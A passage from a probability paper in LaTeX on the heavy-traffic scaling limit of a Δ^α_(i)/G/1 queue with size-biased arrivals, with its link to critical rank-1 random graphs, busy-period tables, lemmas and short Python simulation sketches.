&= 1 - \exp\Big( -\tilde{S}_iS_j\frac{n}{\sum_{i\in[n]}S_i}\Big)\notag\\
&=\mathbb P(T_j\leq \tilde S_i\vert (S_l)_{l\in[n]}),
\end{align}%
where
\begin{equation}%
T_j \stackrel{\mathrm{d}}{=} \mathrm{Exp}_j(\lambda_n S_j),
\end{equation}%
and $\lambda_n = {n}/\sum_{i\in[n]} S_i$.
The rank-1 inhomogeneous random graph with weights $(S_i)_{i=1}^n$ is said to be \emph{critical} (see \cite[(1.13)]{bhamidi2010scaling}) if
\begin{equation}\label{eq:crit_inhomogeneous}%
\frac{\sum_{i\in[n]}S_i^2}{\sum_{i\in[n]}S_i}=\frac{\mathbb E[S^2]}{\mathbb E[S]} + o_{\mathbb P}(n^{-1/3})= 1 + o_{\mathbb P}(n^{-1/3}).
\end{equation}%
Consequently, if $\beta=0$ and $\lambda_n = n/\sum_{i\in[n]}S_i$, the heavy-traffic condition \eqref{eq:crit} for the $\smash{\Delta\!%
\begin{smallmatrix}
\!1 \\
(i)
\end{smallmatrix}/G/1}$ queue implies the criticality condition \eqref{eq:crit_inhomogeneous} for the associated random graph (and vice versa).
\end{remark}
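A rank-1 inhomogeneous random graph with these connection probabilities can be sampled directly; the sketch below (ours) uses $\mathrm{Exp}(2)$ weights, for which $\mathbb E[S^2]/\mathbb E[S]=1$, so the empirical criticality statistic of \eqref{eq:crit_inhomogeneous} concentrates around $1$.

```python
import math
import random

def rank1_graph(weights, rng):
    """Sample the edge set of a rank-1 inhomogeneous random graph:
    i ~ j with probability 1 - exp(-W_i W_j / sum_k W_k)."""
    n, total = len(weights), sum(weights)
    edges = set()
    for i in range(n):
        for j in range(i + 1, n):
            if rng.random() < 1.0 - math.exp(-weights[i] * weights[j] / total):
                edges.add((i, j))
    return edges

rng = random.Random(1)
# Exp(2) weights place the graph in the critical window
w = [rng.expovariate(2.0) for _ in range(200)]
crit_stat = sum(x * x for x in w) / sum(w)   # empirical version of the criticality ratio
edges = rank1_graph(w, rng)
```

The quadratic loop is only a sketch; for large $n$ one would sample edges more cleverly, but the connection probabilities are exactly those displayed above.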
\begin{remark}[Results for the queue-length process]\label{rem:results_queue_length_process}
\bl{By definition, the embedded queue \eqref{eq:queue_length_process} neglects the idle time of the server.} Via a time-change argument it is possible to prove that, in the limit, the (cumulative) idle time is negligible and the embedded queue is arbitrarily close to the queue-length process uniformly over compact intervals. This has been proven for the $\smash{\Delta_{(i)}/G/1}$ queue in \cite{bet2014heavy}, and the techniques developed there can be extended to the $\DGa$ queue without additional difficulties.
\end{remark}
\subsection{The scaling limit of the embedded queue}
All the processes we consider are elements of the space $\mathcal D := \mathcal D([0,\infty))$ of c\`adl\`ag functions, that is, functions that are continuous from the right and admit left limits. To simplify notation, for a discrete-time process $X(\cdot):\mathbb N \rightarrow\mathbb R$, we write $X(t)$, with $t\in[0,\infty)$, instead of $X(\lfloor t\rfloor)$. Note that a process defined in this way has c\`adl\`ag paths. The space $\mathcal D$ is endowed with the usual Skorokhod $J_1$ topology. We then say that a sequence of processes converges in distribution in $(\mathcal D, J_1)$ when the associated laws converge weakly as probability measures on $\mathcal D$ endowed with the $J_1$ topology.
{We are now able to state our main result. Recall that $Q_n(\cdot)$ is the embedded queue-length process of the $\DGa$ queue and let
\begin{equation}\label{def:rescaled_Q}
\mathbf{Q}_n(t) := n^{-1/3} Q_n(tn^{2/3})
\end{equation}%
be the diffusion-scaled queue-length process.
\begin{theorem}[Scaling limit for the $\DGa$ queue]\label{th:main_theorem_delta_G_1}
Assume that $\alpha\in[0,1]$, $\mathbb E[S^{2+\alpha}]<\infty$ and that the heavy-traffic condition \eqref{eq:crit} holds. Assume further that $\mathbf{Q}_n(0) = q $. Then, as $n\rightarrow\infty$,
\begin{equation}\label{eq:main_theorem_delta_G_1_conclusion}%
\mathbf Q_n( \cdot )\stackrel{\mathrm{d}}{\rightarrow} \phi(W)( \cdot )\qquad \mathrm{in}~(\mathcal D, J_1),
\end{equation}%
where $W(\cdot)$ is the diffusion process
\begin{equation}\label{eq:main_theorem_delta_G_1_diffusion_definition}%
W(t)= q + \beta t - \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]}t^2 + \sigma B(t),
\end{equation}%
with $\sigma^2 = \lambda^2 \mathbb E[S^{\alpha}]\mathbb E[S^{2+\alpha}]$ and $B(\cdot)$ is a standard Brownian motion.
\end{theorem}
By the Continuous-Mapping Theorem and Theorem \ref{th:main_theorem_delta_G_1} we have the following:
\begin{theorem}[Number of customers served in the first busy period]\label{th:first_busy_period_convergence}%
Assume that $\alpha\in[0,1]$, $\mathbb E[S^{2+\alpha}]<\infty$ and that the heavy-traffic condition \eqref{eq:crit} holds. Assume further that $\mathbf Q_n(0) = q $. Then, as $n\rightarrow\infty$, the number of customers served in the first busy period, $\mathrm{BP}_n:=H_{Q_n}(0)$, satisfies $n^{-2/3}\mathrm{BP}_n=H_{\mathbf{Q}_n}(0)$ and
\begin{equation}%
n^{-2/3}\mathrm{BP}_n \sr{\mathrm d}{\rightarrow} H_{\phi(W)}(0),
\end{equation}%
where $W(\cdot)$ is given in \eqref{eq:main_theorem_delta_G_1_diffusion_definition}.
\end{theorem}%
}
In particular, if $\vert \mathcal F_n \vert$ denotes the number of vertices in the forest constructed from the $\DGa$ queue in Remark \ref{rem:directed_random_tree_model}, then, as $n\rightarrow\infty$,
\begin{equation}%
n^{-2/3}\vert \mathcal F_n \vert \sr{\mathrm d}{\rightarrow} H_{\phi(W)}(0).
\end{equation}%
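The limit objects in Theorems \ref{th:main_theorem_delta_G_1} and \ref{th:first_busy_period_convergence} can be approximated with a simple Euler scheme; the sketch below (ours) uses unit-mean exponential $S$, for which $\mathbb E[S^p]=\Gamma(p+1)$ and $\lambda=1/\mathbb E[S^{1+\alpha}]$, and exploits that for $q>0$ the first passage of $\phi(W)$ at $0$ coincides with that of $W$ itself.

```python
import math
import random

def fpt_limit_diffusion(q, beta, alpha, dt=1e-3, t_max=50.0, rng=None):
    """Euler scheme for W(t) = q + beta*t - kappa*t^2 + sigma*B(t), with
    kappa = lam*E[S^(1+2a)]/(2*E[S^a]) and sigma^2 = lam^2*E[S^a]*E[S^(2+a)]
    for S ~ Exp(1).  Returns the first time W hits 0 (capped at t_max)."""
    rng = rng or random.Random(0)
    g = math.gamma
    lam = 1.0 / g(2 + alpha)                          # lambda = 1/E[S^{1+alpha}]
    kappa = lam * g(2 + 2 * alpha) / (2.0 * g(1 + alpha))
    sigma = lam * math.sqrt(g(1 + alpha) * g(3 + alpha))
    w, t = float(q), 0.0
    while t < t_max:
        t += dt
        w += (beta - 2.0 * kappa * t) * dt + sigma * math.sqrt(dt) * rng.gauss(0.0, 1.0)
        if w <= 0.0:
            return t
    return t_max

# crude Monte Carlo estimate of E[H_{phi(W)}(0)] for alpha = 1, q = beta = 1
rng = random.Random(7)
est = sum(fpt_limit_diffusion(1.0, 1.0, 1.0, rng=rng) for _ in range(20)) / 20
```

For $\alpha=1$ and exponential services, such an estimate can be compared with the $n=\infty$ entry of Table \ref{tab:convergence_expectation_busy_period} (up to Euler discretization bias).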
{
Theorem \ref{th:main_theorem_delta_G_1} implies that the typical queue length for the $\DGa$ system in heavy traffic is $O_{\mathbb P}(n^{1/3})$, and that the typical busy period consists of $O_{\mathbb P}(n^{2/3})$ services. The linear drift $t\mapsto\beta t$ describes the position of the system inside the critical window. For $\beta>0$ the system is initially overloaded and the process $W(\cdot)$ is more likely to cause a large initial excursion. For $\beta<0$ the traffic intensity approaches $1$ from below, so that the system is initially stable. Consequently, the process $W(\cdot)$ has a strong initial negative drift, so that $\phi(W)(\cdot)$ is close to zero also for small $t$. Finally, the negative quadratic drift $t\mapsto - \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]} t^2$ captures the \emph{depletion-of-points effect}. Indeed, for large times, the process $W(t)$ is dominated by $- \lambda\frac{\mathbb E[S^{1+2\alpha}]}{2\mathbb E[S^{\alpha}]} t^2$, so that $\phi(W)(t)$ performs only small excursions away from zero. See Figure \ref{fig:stable_motion_different_linear_drift_examples}.
\begin{figure}[hbt]
\centering
\includestandalone[mode=image]{sample_paths}
\caption{Sample paths of the process $\mathbf Q_n(\cdot)$ for various values of $\alpha$ and $n= 10^4$. The service times are taken unit-mean exponential. The dashed curves represent the drift $t\mapsto q+ \beta t - \lambda \mathbb E[S^{1+2\alpha}]/(2\mathbb E[S^{\alpha}]) t^2$. In all plots, $q = 1$, $\beta=1$, $\lambda=1/\mathbb E[S^{1+\alpha}]$.}
\label{fig:stable_motion_different_linear_drift_examples}
\end{figure}
Let us now compare Theorem \ref{th:main_theorem_delta_G_1} with two known results.
For $\alpha = 0$, the limit diffusion simplifies to
\begin{equation}\label{eq:limit_diffusion_alpha_0}
W(t) = \beta t- \frac{1}{2} t^2 + \sigma B(t),
\end{equation}
with $\sigma ^2 = \lambda^2 \mathbb E[S^2]$, in agreement with \cite[Theorem 5]{bet2014heavy}. In \cite{bhamidi2010scaling} it is shown that, when $(\mathcal W_i)_{i\in[n]}$ are i.i.d.~and further assuming that $\mathbb E[\mathcal W^2]/\mathbb E[\mathcal W] = 1$, the exploration process of the corresponding inhomogeneous random graph converges to
\begin{align}%
\overline{W}(t) &= \beta t - \frac{\mathbb E[\mathcal W^3]}{2\mathbb E[\mathcal W^2]^2}t^2 + {\frac{\sqrt{\mathbb E[\mathcal W]\mathbb E[\mathcal W^3]}}{\mathbb E[\mathcal W^2]}} B(t).
\end{align}%
For $\alpha = 1$, \eqref{eq:main_theorem_delta_G_1_diffusion_definition} can be rewritten using \eqref{eq:crit} as
\begin{equation}\label{eq:limit_diffusion_alpha_1}%
W(t) = \beta t - \frac{\mathbb E[S^3]}{2\mathbb E[S^2]^2} t^2 + {\frac{\sqrt{\mathbb E[S]\mathbb E[S^3]}}{\mathbb E[S^2]}}B(t).
\end{equation}%
Therefore the two processes coincide if $\mathcal W_i = S_i$, as expected.
\subsection{Numerical results}
We now use Theorem \ref{th:first_busy_period_convergence} to obtain numerical results for the first busy period. We shall also use the explicit expression of the probability density function of the first passage time of zero of $\phi(W)$ obtained by Martin-L\"of \cite{martin1998final}, see also \cite{hofstad2010critical}. Let $\mathrm{Ai}(x)$ and $\mathrm{Bi}(x)$ denote the classical Airy functions (see \cite{abramowitz1964handbook}). The first passage time of zero of $W(t) = q + \beta t -\frac{1}{2}t^2 + \sigma B(t)$ has probability density \cite{martin1998final}
\begin{equation}\label{eq:first_busy_period_density}%
f(t;\beta,\sigma) = \mathrm e^{-((t-\beta)^3+\beta^3)/6\sigma^2-\beta a}\int_{-\infty}^{+\infty}\mathrm e^{tu}\frac{\mathrm{Bi}(cu)\mathrm{Ai}(c(u-a))-\mathrm{Ai}(cu)\mathrm{Bi}(c(u-a))}{\pi(\mathrm{Ai}(cu)^2 + \mathrm{Bi}(cu)^2)}\mathrm{d} u,
\end{equation}%
where $c = (2\sigma^2)^{1/3}$ and $a=q/\sigma^2>0$. The result \eqref{eq:first_busy_period_density} can be extended to a diffusion with a general quadratic drift through the scaling relation $W(\tau^2 t) \stackrel{\mathrm{d}}{=} \tau(q/\tau + \beta \tau t - \tau^3 t^2/2 + \sigma B(t))$, valid as processes in $t$.
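The scaling relation amounts to a change of variables reducing any quadratic-drift coefficient $\kappa$ to the standard $1/2$: writing $W(t)=q+\beta t-\kappa t^2+\sigma B(t)$ and choosing $\tau=(2\kappa)^{-1/3}$ gives $W(\tau^2t)\stackrel{\mathrm d}{=}\tau W'(t)$ with $W'$ in standard form. A small sketch of the bookkeeping (function name ours):

```python
def standardize(q, beta, kappa):
    """Reduce W(t) = q + beta*t - kappa*t^2 + sigma*B(t) to the standard form
    q' + beta'*t - t^2/2 + sigma*B(t) via W(tau^2 t) =d tau * W'(t), where
    tau = (2*kappa)**(-1/3), q' = q/tau, beta' = beta*tau, sigma unchanged.
    First passage times then satisfy T = tau^2 * T'."""
    tau = (2.0 * kappa) ** (-1.0 / 3.0)
    return tau, q / tau, beta * tau

# kappa = 1/2 is already in standard form, so the reduction is the identity
tau, q1, b1 = standardize(1.0, 1.0, 0.5)
```

In particular the density of the general first passage time is $t\mapsto f(t/\tau^2;\beta',\sigma)/\tau^2$ with $f$ as in \eqref{eq:first_busy_period_density}.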
\begin{figure}[!hbt]
\centering
\includestandalone[mode=image|tex]{first_busy_period_density}
\caption{Density plot (black) and Gaussian kernel density estimates (colored) obtained by running $10^6$ simulations of a $\Delta_{(i)}^{\alpha}/G/1$ queue with $n=\,100,\,1000,\,10000$ customers and $\alpha = 0,~1/2,~1$. In all cases, the service times are exponentially distributed and $q=\beta=\mathbb E[S]=1$.}
\label{fig:distribution_first_busy_period}
\end{figure}
Figure \ref{fig:distribution_first_busy_period} shows the empirical density of $\mathrm{BP}_n$, for increasing values of $n$ and various values of $\alpha$, together with the exact limiting value \eqref{eq:first_busy_period_density}.
\begin{table}[!htbp]
\centering
\begin{tabular}{ c c c c c c c c c c}
& \multicolumn{3}{ c }{Deterministic} & \multicolumn{3}{ c }{Exponential}& \multicolumn{3}{ c }{Hyperexponential}\\
$\alpha$ & 0 & 1/2 & 1 & 0 & 1/2 & 1 & 0 & 1/2 & 1\\
\hline
$n$ \\
\multicolumn{1}{r}{$10^1$} & 1.1318 & 1.1318 & 1.1318 & 1.0359 & 0.8980 & 0.7429 & 0.8920 & 0.6356 & 0.5332 \\
\multicolumn{1}{r}{$10^2$} & 1.5842 & 1.5842 & 1.5842 & 1.3584 & 1.0924 & 0.8333 & 1.0959 & 0.7454 & 0.5525 \\
\multicolumn{1}{r}{$10^3$} & 1.9188 & 1.9188 & 1.9188 & 1.6387 & 1.2506 & 0.9284 & 1.2936 & 0.8352 & 0.6134 \\
\multicolumn{1}{r}{$10^4$} & 2.1474 & 2.1474 & 2.1474 & 1.8419 & 1.3925 & 1.0014 & 1.4960 & 0.9210 & 0.6554 \\
\multicolumn{1}{c}{$\infty$~~} & 2.3374 & 2.3374 & 2.3374 & 2.0038 & 1.4719 & 1.0440 & 1.6242 & 0.9717 & 0.6881
\end{tabular}
\caption{Numerical values of $n^{-2/3}\mathbb E[\mathrm{BP}_n]$ for different population sizes and the exact expression for $n=\infty$ computed using \eqref{eq:first_busy_period_density}. The service requirements are displayed in order of increasing coefficient of variation. In all cases $q = \beta = \mathbb E[S] = 1$. The hyperexponential service times follow a rate $\lambda_1 = 0.501$ exponential distribution with probability $p_1=1/2$ and a rate $\lambda_2 = 250.5$ exponential distribution with probability $p_2=1-p_1=1/2$. Each value for finite $n$ is the average of $10^4$ simulations. }\label{tab:convergence_expectation_busy_period}
\end{table}
Table \ref{tab:convergence_expectation_busy_period} shows the mean busy period for different choices of $\alpha$ and different service time distributions. We computed the exact value for $n=\infty$ by numerically integrating \eqref{eq:first_busy_period_density}.
Observe that $\mathbb E[\mathrm{BP}_n]$ decreases with $\alpha$. This might seem counterintuitive, because the larger $\alpha$, the more likely it is that customers with large service requirements join the queue early, and these might in turn initiate a long busy period. Let us explain this apparent contradiction. When the arrival rate $\lambda$ is fixed, assumption \eqref{eq:crit} does not necessarily hold and $\mathbb E[\mathrm{BP}_n]$ increases with $\alpha$, as can be seen in Table \ref{tab:fixed_lambda_mean_busy_period}.
\begin{table}[!b]%
\centering
\begin{tabular}{c c c c c c}
&\multicolumn{5}{c}{ Exponential }\\
$\alpha$ & 0 & 1/4 & 1/2 & 3/4 & 1 \\
\hline
$n$ \\
$10^1$ & 1.0854 & 1.0922 & 1.1053 & 1.1118 & 1.1306 \\
$10^2$ & 5.9515 & 8.1928 & 11.4478 & 16.3598 & 22.0381 \\
\end{tabular}
\caption{Expected number of customers served in the first busy period of the \emph{nonscaled} $\Delta_{(i)}^{\alpha}/G/1$ queue with mean one exponential service times and arrival rate $\lambda = 0.01$. In all cases $q=1$. Each value is the average of $10^4$ simulations.}\label{tab:fixed_lambda_mean_busy_period}
\end{table}%
However, our heavy-traffic condition \eqref{eq:crit} implies that $\lambda$ depends on $\alpha$ since $\lambda = 1/\mathbb E[S^{1+\alpha}]$. The interpretation of condition \eqref{eq:crit} is that, on average, one customer joins the queue during one service time. Notice that, due to the size-biasing, the average service time is not $\mathbb E[S]$. Therefore, the number of customers that join during a (long) service is roughly equal to one as $\alpha\uparrow 1$. However, once customers with large service requirements have been served, they can no longer rejoin the pool of potential arrivals, and as $\alpha\uparrow 1$ such customers leave the system earlier. Therefore, as $\alpha\uparrow1$, the resulting second-order \emph{depletion-of-points effect} causes shorter excursions as time progresses; see also Figure \ref{fig:stable_motion_different_linear_drift_examples}. In the limit process, this phenomenon is represented by the fact that the coefficient of the negative quadratic drift increases as $\alpha\uparrow1$, as shown in the following lemma.
{
\begin{lemma}%
Let
\begin{equation}\label{eq:coefficient_negative_quadratic_drift}%
\alpha\mapsto f(\alpha) := \frac{\mathbb E[S^{1+2\alpha}]}{\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}]}.
\end{equation}%
Then $f'(\alpha)\geq0$.
\end{lemma}%
}
\begin{proof}%
Since
\begin{equation}%
f'(\alpha) = \frac{2\mathbb E[\log(S)S^{1+2\alpha}]}{\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}]} - \frac{\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]^2\mathbb E[S^{1+\alpha}]} - \frac{\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{1+\alpha}]}{\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}]^2},
\end{equation}%
$f'(\alpha)\geq 0$ if and only if
\begin{align}%
2 \mathbb E[\log(S)S^{1+2\alpha}]\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}] &\geq\mathbb E[S^{1+\alpha}]\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{\alpha}] \notag\\
&\quad+ \mathbb E[S^{\alpha}]\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{1+\alpha}].
\end{align}%
We split the left-hand side in two identical terms and show that each of them dominates one term on the right-hand side. That is
\begin{equation}\label{eq:coefficient_negative_drift_proof_first_term}%
\mathbb E[\log(S)S^{1+2\alpha}]\mathbb E[S^{\alpha}]\mathbb E[S^{1+\alpha}] \geq \mathbb E[S^{1+\alpha}]\mathbb E[S^{1+2\alpha}]\mathbb E[\log(S)S^{\alpha}],
\end{equation}%
the proof of the second bound being analogous. The inequality \eqref{eq:coefficient_negative_drift_proof_first_term} is equivalent to
\begin{equation}\label{eq:coefficient_negative_drift_proof_first_term_rewritten}%
\frac{\mathbb E[(\log(S)S^{1+\alpha})S^{\alpha}]}{\mathbb E[S^{\alpha}]} \geq \frac{\mathbb E[S^{1+\alpha}S^{\alpha}]}{\mathbb E[S^{\alpha}]}\frac{\mathbb E[\log(S)S^{\alpha}]}{\mathbb E[S^{\alpha}]}.
\end{equation}%
The term on the left and the two terms on the right can be rewritten as the expectation of a size-biased random variable $W$, so that \eqref{eq:coefficient_negative_drift_proof_first_term_rewritten} is equivalent to
\begin{equation}\label{eq:coefficient_negative_drift_proof_final}%
\mathbb E[\log(W)W^{1+\alpha}] \geq \mathbb E[\log(W)]\mathbb E[W^{1+\alpha}] .
\end{equation}%
Finally, the inequality \eqref{eq:coefficient_negative_drift_proof_final} holds by the Chebyshev association inequality (Harris inequality): $W$ is positive with probability one, both $x\mapsto\log(x)$ and $x\mapsto x^{1+\alpha}$ are increasing functions, and hence $\log(W)$ and $W^{1+\alpha}$ are positively correlated.
\end{proof}%
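As a sanity check on the lemma, for mean-one exponential services one can evaluate \eqref{eq:coefficient_negative_quadratic_drift} in closed form via $\mathbb E[S^{\beta}] = \Gamma(1+\beta)$ and verify the monotonicity numerically. A minimal sketch (an illustration for this particular service distribution, not part of the proof):

```python
import math

def drift_coefficient(alpha):
    # f(alpha) = E[S^(1+2a)] / (E[S^a] * E[S^(1+a)]) with E[S^b] = Gamma(1+b)
    # for mean-one exponential service times
    return math.gamma(2 + 2 * alpha) / (math.gamma(1 + alpha) * math.gamma(2 + alpha))

vals = [drift_coefficient(a / 100) for a in range(101)]
assert all(x <= y for x, y in zip(vals, vals[1:]))  # f is nondecreasing on [0, 1]
```

In particular $f(0)=1$ and $f(1)=3$ in this case, so the negative quadratic drift at $\alpha=1$ is three times as strong as at $\alpha=0$.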
\section{Overview of the proof of the scaling limit}\label{sec:overview_proof}
The proof of Theorem \ref{th:main_theorem_delta_G_1} extends the techniques we developed in \cite{bet2014heavy}. However, the dependency structure of the arrival times complicates the analysis considerably. Customers with larger job sizes have a higher probability of joining the queue early, and this gives rise to a size-biased reordering of the service times. In the next section we study this phenomenon in detail.
\subsection{Preliminaries} \label{sec:preliminaries}
Given two sequences of random variables $(X_n)_{n\geq1}$ and $(Y_n)_{n\geq1}$, we say that $X_n$ converges in probability to $X$, and we denote it by $X_n\sr{\mathbb P}{\rightarrow} X$, if $\mathbb P (\vert X_n - X\vert >\varepsilon) \rightarrow0$ as $n\rightarrow\infty$ for each $\varepsilon>0$. We also write $X_n = o_{\mathbb P}(Y_n)$ if $X_n/Y_n \stackrel{\mathbb P}{\rightarrow}0$ and $X_n=O_{\mathbb P}(Y_n)$ if $(X_n/Y_n)_{n\geq1}$ is tight. Given two real-valued random variables $X$, $Y$ we say that $X$ \emph{stochastically dominates} $Y$, and denote it by $Y\preceq X$, if $\mathbb{P}(X\leq x) \leq \mathbb P(Y\leq x)$ for all $x\in\mathbb R$.
For our results, we condition on the entire sequence $(S_i)_{i\geq1}$. More precisely, if the random variables that we consider are defined on the probability space $(\Omega, {\mathcal F}, {\mathbb P})$, then we define a new probability space $(\Omega, \mathcal F_{\scriptscriptstyle S}, \mathbb P_{\sss S})$, with $ \mathbb P_{\sss S}(A) := {\mathbb P}(A\vert(S_i)_{i=1}^{\infty})$ and $\mathcal F_{\scriptscriptstyle S} := \sigma(\{{\mathcal F} , (S_i)_{i=1}^{\infty}\})$, the $\sigma$-algebra generated by $\mathcal F$ and $(S_i)_{i=1}^{\infty}$. Correspondingly, for any random variable $X$ on $\Omega$ we define $\E_{\sss S}[X]$ as the expectation with respect to $\mathbb P_{\sss S}$, and $\mathbb E[X]$ for the expectation with respect to $\mathbb P$. We say that a sequence of events $(\mathcal E_n)_{n\geq1}$ holds with high probability (briefly, w.h.p.) if $\mathbb P (\mathcal E_n) \rightarrow1$ as $n\rightarrow\infty$.
First, we recall a well-known result that will be useful on several occasions.
\begin{lemma}\label{lem:max_iid_random_variables}
Assume $(X_i)_{i=1}^n$ is a sequence of positive i.i.d.~random variables such that $\mathbb E[X_i] <\infty$. Then $\max_{i\in[n]}X_i = o_{\mathbb P}(n)$.
\end{lemma}%
\begin{proof}%
We have the inclusion of events
\begin{equation}
\Big\{\max_{i\in[n]} X_i \geq \varepsilon n \Big\} \subseteq \bigcup_{i=1}^n\Big\{X_i\geq \varepsilon n\Big\}.
\end{equation}%
Therefore,
\begin{equation}
\mathbb P (\max_{i\in[n]} X_i \geq \varepsilon n) \leq \sum_{i=1}^n \mathbb P (X_i \geq \varepsilon n).
\end{equation}%
Since for any positive random variable $Y$, $\varepsilon \mathds 1_{\{Y\geq\varepsilon\}}\leq Y \mathds 1_{\{Y\geq\varepsilon\}} $ almost surely, it follows
\begin{equation}%
\mathbb P (\max_{i\in[n]} X_i \geq \varepsilon n) \leq \frac{\sum_{i=1}^{n}\mathbb E[X_i\mathds 1_{\{X_i\geq\varepsilon n\}}]}{\varepsilon n} = \frac{\mathbb E[X_1 \mathds 1_{\{X_1\geq\varepsilon n\}}]}{\varepsilon}.
\end{equation}%
The right-most term tends to zero as $n\rightarrow\infty$ since $\mathbb E[X_1]<\infty$, and this concludes the proof.
\end{proof}%
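Lemma \ref{lem:max_iid_random_variables} is easy to visualize numerically: for exp(1) samples the maximum grows like $\log n$, which is $o(n)$. A minimal sketch (illustration only, not part of the proof):

```python
import random

rng = random.Random(7)
for n in (10**3, 10**4, 10**5):
    m = max(rng.expovariate(1.0) for _ in range(n))
    # the maximum of n exp(1) samples concentrates around log(n), far below n
    assert m / n < 0.05
```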
Given a vector $\bar x =(x_1,x_2,\ldots,x_n)$ with deterministic, real-valued entries, the size-biased ordering of $\bar x$ is a \emph{random} vector $\bar X^{\scriptscriptstyle(s)} = (X^{\scriptscriptstyle(s)}_1,X^{\scriptscriptstyle(s)}_2,\ldots,X^{\scriptscriptstyle(s)}_n)$ such that
\begin{equation}%
\mathbb P (X^{\scriptscriptstyle(s)}_1 = x_j) = \frac{x_j}{\sum_{l=1}^n x_l},\qquad \mathbb P (X^{\scriptscriptstyle(s)}_2 = x_j \mid X^{\scriptscriptstyle(s)}_1) = \frac{x_j}{\sum_{l=1}^n x_l - X^{\scriptscriptstyle(s)}_1},\qquad\ldots
\end{equation}%
More generally, for any $\alpha\in\mathbb R$ the $\alpha$-size-biased ordering of $\bar x$ is a random vector $\bar X^{\scriptscriptstyle(\alpha)} = (X^{\scriptscriptstyle(\alpha)}_1, X^{\scriptscriptstyle(\alpha)}_2,\ldots, X^{\scriptscriptstyle(\alpha)}_n)$ such that
\begin{equation}%
\mathbb P (X^{\scriptscriptstyle(\alpha)}_1 = x_j) = \frac{x^{\alpha}_j}{\sum_{l=1}^n x^{\alpha}_l},\qquad\mathbb P (X^{\scriptscriptstyle(\alpha)}_2 = x_j \mid X^{\scriptscriptstyle(\alpha)}_1 = x_i) = \frac{x^{\alpha}_j}{\sum_{l=1}^n x^{\alpha}_l - x^{\alpha}_i},\qquad\ldots
\end{equation}%
Finally, we define
\begin{equation}%
\served{k} = \{c(1), \ldots, c(k)\}
\end{equation}%
as the set of the first $k$ customers served. The following lemma is the first step in understanding the structure of the arrival process:
\begin{lemma}[Size-biased reordering of the arrivals]\label{lem:size_biased_reordering}%
The order of appearance of customers is the $\alpha$-size-biased ordering of their service times. In other words,
\begin{equation}%
\mathbb P_{\sss S}(c(j) = i \mid \served{j-1}) = \frac{S_i^{\alpha}}{\sum_{l\notin\served{j-1}}S^{\alpha}_l}.
\end{equation}%
\end{lemma}%
\begin{proof}
Conditioned on $(S_l)_{l=1}^n$, the arrival times are independent exponential random variables. By basic properties of exponentials, we have
\begin{align}\label{eq:size_biased_reordering}%
\mathbb P_{\sss S}&(c(j) = i \mid \served{j-1}) = \mathbb P_{\sss S}(\min\{T_l:~l\notin \served{j-1}\} = T_i\mid \served{j-1}) = \frac{S_i^{\alpha}}{\sum_{l\notin\served{j-1}}S^{\alpha}_l},
\end{align}%
as desired.
\end{proof}
We remark that \eqref{eq:size_biased_reordering} differs from the classical size-biased reordering in that the weights are a \emph{non-linear} function of the $(S_i)_{i=1}^n$.
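Lemma \ref{lem:size_biased_reordering} can be checked by direct simulation: with arrival clocks $T_i\sim\textrm{exp}(\lambda S_i^{\alpha})$, the index of the minimal clock should be distributed proportionally to $S_i^{\alpha}$. A minimal Monte Carlo sketch (the service values and sample sizes below are arbitrary choices):

```python
import random

def first_arrival(S, lam, alpha, rng):
    # index of the customer whose exponential clock rings first
    T = [rng.expovariate(lam * s ** alpha) for s in S]
    return min(range(len(S)), key=lambda i: T[i])

rng = random.Random(0)
S, alpha, lam, trials = [0.5, 1.0, 2.0], 1.0, 1.0, 20000
counts = [0] * len(S)
for _ in range(trials):
    counts[first_arrival(S, lam, alpha, rng)] += 1
weights = [s ** alpha for s in S]
freqs = [c / trials for c in counts]
# empirical frequencies should match S_i^alpha / sum_l S_l^alpha
assert all(abs(f - w / sum(weights)) < 0.02 for f, w in zip(freqs, weights))
```

Note that the rate $\lambda$ cancels in the minimum, exactly as in \eqref{eq:size_biased_reordering}.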
The next lemma is crucial: it establishes a uniform bound on the conditional moments of the service requirements of the customers in order of appearance. \bl{In our definition of the queueing process \eqref{eq:queue_length_process}--\eqref{eq:number_arrivals_during_one_service}, we do not keep track of the service requirements of the customers that join the queue, but only of their arrival times \eqref{eq:arrival_times}. Therefore, at the start of service, a customer's service requirement is a random variable that depends on its arrival time relative to the remaining customers. Lemma \ref{lem:size_biased_reordering} then gives the precise distribution of the service requirement of the $j$-th customer entering service.}
Recall that $X$ stochastically dominates $Y$ (with notation $Y\preceq X$) if and only if there exists a probability space $(\bar{\Omega},\bar{ \mathcal F}, \bar{\mathbb P})$ and two random variables $\bar{X}$, $\bar{Y}$ defined on $\bar{\Omega}$ such that $\bar{X}\stackrel{\mathrm d}{=} X$, $\bar{Y}\stackrel{\mathrm d}{=} Y$ and $\bar{\mathbb P}(\bar Y\leq \bar X) = 1$.
\begin{lemma}\label{lem:expectation_service_times_ordering}
Assume that $\alpha>0$. Let $f:\mathbb R^+\rightarrow\mathbb R^+$ be a nonnegative function such that $\mathbb E[f(S)S^{\alpha}]<\infty$. Then there exists a constant $C_{f, \scriptscriptstyle S}$ such that almost surely, for $n$ large enough,
\begin{equation}\label{eq:expectation_service_times_ordering}
\E_{\sss S}[f(S_{c(k)})]\leq C_{f,\scriptscriptstyle S}<\infty,
\end{equation}
uniformly in $k\leq c n$, for a fixed $c\in(0,1)$.
\end{lemma}
\begin{proof}
We compute explicitly
\begin{align}%
\E_{\sss S}[f(S_{c(k)})] &= \E_{\sss S}\Big[\frac{\sum_{j\notin\served{k-1}}f(S_j)S_j^{\alpha}}{\sum_{j\notin\served{k-1}}S_j^{\alpha}}\Big]\notag\\
& = \E_{\sss S}\Big[\frac{\sum_{j\in[n]}f(S_j)S_j^{\alpha}- \sum_{j\in\served{k-1}}f(S_j)S_j^{\alpha}}{\sum_{j\notin\served{k-1}}S_j^{\alpha}}\Big]\notag\\
& \leq \E_{\sss S}\Big[\frac{1}{\sum_{j\notin\served{k-1}}S_j^{\alpha}}\Big]\sum_{j\in[n]}f(S_j)S_j^{\alpha}.
\end{align}%
